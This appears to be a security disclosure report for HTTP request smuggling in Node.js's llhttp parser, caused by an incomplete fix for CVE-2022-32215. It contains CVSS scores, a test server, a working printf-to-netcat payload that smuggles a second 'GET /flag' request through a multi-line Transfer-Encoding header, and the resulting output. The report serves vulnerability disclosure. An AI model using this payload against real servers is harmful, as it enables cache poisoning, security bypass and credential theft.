ShacharmH1:1665156Node.js: HTTP Request Smuggling Due to Incorrect Parsing of Multi-line Transfer-Encoding (improper fix for CVE-2022-32215)
6.5 Medium
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
LOW
Integrity Impact
LOW
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N
6.4 Medium
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
NONE
AV:N/AC:L/Au:N/C:P/I:P/A:N
0.005 Low
EPSS
Percentile
73.5%
Summary:
Due to an incomplete fix for CVE-2022-32215, the llhttp parser in the http module in Node v16.16.0 and 18.7.0 still does not correctly handle multi-line Transfer-Encoding headers. This can lead to HTTP Request Smuggling (HRS).
Description: [add more details about this vulnerability]
We have identified that the root issue of CVE-2022-32215 (that was reported here) was seemingly not fixed at all. Running the same exploit produces the same unwanted result. For the sake of brevity, I won’t repeat the description, it can be seen in the original issue.
Steps To Reproduce:
The reproduction steps are the same from the original issue
Testing Server
Run the following server (node server.js):
const http = require('http');
http.createServer((request, response) => {
let body = [];
request.on('error', (err) => {
response.end("error while reading body: " + err)
}).on('data', (chunk) => {
body.push(chunk);
}).on('end', () => {
body = Buffer.concat(body).toString();
response.on('error', (err) => {
response.end("error while sending response: " + err)
});
response.end(JSON.stringify({
"Headers": request.headers,
"Length": body.length,
"Body": body,
}) + "\n");
});
}).listen(80);
Payload
printf "POST / HTTP/1.1\r\n"\
"Host: 127.0.0.1\r\n"\
"Transfer-Encoding: chunked\r\n"\
" , chunked-false\r\n"\
"\r\n"\
"1\r\n"\
"A\r\n"\
"0\r\n"\
"\r\n"\
"GET /flag HTTP/1.1\r\n"\
"Host: 127.0.0.1\r\n"\
"foo: x\r\n"\
"\r\n"\
"\r\n" | nc localhost 80
Output
HTTP/1.1 200 OK
Date: Sun, 06 Mar 2022 03:34:05 GMT
Connection: keep-alive
Keep-Alive: timeout=5
Content-Length: 101
{"Headers":{"transfer-encoding":"chunked , chunked-false"},"Length":1,"Body":"A"}
HTTP/1.1 200 OK
Date: Sun, 06 Mar 2022 03:34:05 GMT
Connection: keep-alive
Keep-Alive: timeout=5
Content-Length: 64
{"Headers":{"host":"127.0.0.1", "foo":"x"},"Length":0,"Body":""}
As you can see, the payload was parsed as two requests (POST to / , and GET to /flag) which is erroneous behavior (the first request was parsed as a chunked request, which is wrong)
The expected output should be -
HTTP/1.1 400 Bad Request
Connection: close
Supporting Material/References:
Exploitation of the issue on Node 16.16.0 -
{F1861233}
Credit
The vulnerability was discovered by Liav Gutman of the JFrog CSO Team
Impact
Depending on the specific web application, HRS can lead to cache poisoning, bypassing of security layers, stealing of credentials and so on.
Related
6.5 Medium
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
LOW
Integrity Impact
LOW
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N
6.4 Medium
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
NONE
AV:N/AC:L/Au:N/C:P/I:P/A:N
0.005 Low
EPSS
Percentile
73.5%